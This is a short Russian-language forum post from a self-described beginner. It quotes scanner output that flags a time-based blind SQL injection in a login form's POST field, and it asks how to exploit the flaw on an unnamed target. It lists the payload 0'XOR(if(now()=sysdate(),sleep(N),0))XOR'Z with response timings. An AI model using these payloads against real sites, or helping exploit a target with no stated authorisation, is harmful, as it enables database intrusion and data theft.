Добрый день форумчане, недавно вкатился в изучение уязвимостей веб приложений сейчас изучаю все что связано с sql injection
Вчера вечером сканировал один таргет и сканер выдал вот это:
POST (multipart) input login was set to 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
Tests performed:
Вопрос, как можно это эксплуатировать?
Вчера вечером сканировал один таргет и сканер выдал вот это:
Attack Details
POST (multipart) input login was set to 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
Tests performed:
- 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.265
- 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.253
- 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 15.332
- 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.184
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.257
- 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.314
- 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.11
Вопрос, как можно это эксплуатировать?